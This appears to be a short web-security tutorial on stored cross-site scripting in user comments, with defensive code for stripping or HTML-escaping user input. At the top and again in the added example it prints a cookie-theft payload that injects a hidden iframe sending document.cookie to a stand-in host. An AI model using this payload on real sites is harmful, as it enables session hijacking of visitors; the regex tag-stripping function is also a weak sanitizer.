The scenario
The problem
<script>
document.body.innerHTML += '<iframe height="1" width="1" src="http://example.com/save-cookie.php?cookie-data='+encodeURIComponent(document.cookie)+'"></iframe>';
</script>
The solution
Well, the solution is simply to assume that every user coming to your site could be Joe the Crook, and to be cautious whenever you handle user-provided data. What we need to do is very simple.
1. Either remove all (or some) HTML tags from any user-entered content before saving it to the database.
2. Or strip all (or some) HTML tags from the user-entered data each time it is rendered to someone.
Both methods are more or less the same and have minor trade-offs. I leave you to be the judge of that.
If you are building a JavaScript/Node.js application, you can use the code below to strip all HTML tags from the passed content.
// Strips HTML tags from `text` and returns plain text.
// Note: this relies on the browser DOM (`document`), so it must run
// client-side; in a plain Node.js process `document` is not defined.
function strip_html_tags(text) {
    var temp_element = document.createElement('div');
    // Remove anything that looks like a tag, then let the DOM decode
    // any remaining entities (e.g. &amp; -> &) into plain text.
    temp_element.innerHTML = text.replace(/(<([^>]+)>)/ig, '');
    return temp_element.textContent || temp_element.innerText || '';
}
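As an added example (not code from the original post), here is the second option implemented by HTML-encoding user data at render time instead of stripping it: the visitor's text survives intact ("a < b" still reads "a < b"), yet the browser can only ever treat it as text. The function names, the fixed comment template and the sample payload are my own constructions; the code is pure JavaScript, so it runs in Node.js as well as in the browser.

```javascript
// Added example: neutralise user-supplied content at render time by
// HTML-encoding it rather than stripping tags.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Escape the five characters that can change meaning inside an HTML
// text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the markup for one stored comment. The template is fixed and only
// escaped values are interpolated, so user data can never close our
// element or open a new one (hypothetical template, not the post's).
function renderComment(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Defensive check: true when the rendered string contains any tag other
// than our own wrapper elements, i.e. user-supplied markup survived.
function containsForeignTag(html) {
  const tags = html.match(/<\/?([a-z][a-z0-9]*)/gi) || [];
  return tags.some((t) => !/^<\/?(div|b)$/i.test(t));
}

// Constructed sample: a comment body of the kind the post describes,
// trying to inject a hidden iframe that would leak document.cookie.
const maliciousComment =
  '<iframe height="1" width="1" src="http://example.com/save-cookie.php?cookie-data=..."></iframe>';

// Demo when run directly: the iframe is rendered as visible text.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderComment('Joe the Crook', maliciousComment));
}
```

The `containsForeignTag` check is the kind of assertion worth keeping in a unit test for the render path, so a future template change that reintroduces raw interpolation is caught immediately.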
For some reference on XSS attacks, see this.